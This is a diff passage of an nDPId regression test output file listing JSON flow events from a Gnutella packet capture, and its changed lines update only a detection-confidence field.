Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2838,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95716,"flow_last_seen":287440,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2001,"flow_avg_l4_payload_len":250,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":95893,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2031,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287425,"flow_last_seen":287425,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.148.100.237","src_port":28681,"dst_port":23459,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287425,"flow_last_seen":287425,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.148.100.237","src_port":28681,"dst_port":23459,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287428,"flow_last_seen":287428,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":28681,"dst_port":13060,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3142,8 +3142,8 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287650,"flow_last_seen":287650,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.206.27.26","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.47.223.27","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.47.223.27","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":101162,"flow_last_seen":287624,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00581{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":251765,"flow_last_seen":287535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00566{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":251765,"flow_last_seen":287535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287309,"flow_last_seen":287309,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.173.230.98","src_port":28681,"dst_port":19004,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3160,7 +3160,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":28681,"dst_port":64577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243619,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.84.134.136","src_port":28681,"dst_port":21407,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243619,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.84.134.136","src_port":28681,"dst_port":21407,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.25.47","src_port":28681,"dst_port":21293,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.25.47","src_port":28681,"dst_port":21293,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287511,"flow_last_seen":287511,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.237.10.152","src_port":28681,"dst_port":21293,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3175,7 +3175,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287441,"flow_last_seen":287441,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52274,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287600,"flow_last_seen":287600,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.118.77","src_port":28681,"dst_port":62191,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287600,"flow_last_seen":287600,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.118.77","src_port":28681,"dst_port":62191,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":3256,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287859,"flow_last_seen":287859,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.128.228","src_port":28681,"dst_port":3256,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287496,"flow_last_seen":287579,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3216,7 +3216,7 @@ 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":115369,"flow_last_seen":287650,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":28681,"dst_port":2556,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":28681,"dst_port":2556,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":101837,"flow_last_seen":289958,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":28681,"dst_port":53143,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":28681,"dst_port":53143,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287498,"flow_last_seen":287498,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.194.73","src_port":28681,"dst_port":1995,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3249,7 +3249,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287621,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":28681,"dst_port":54459,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 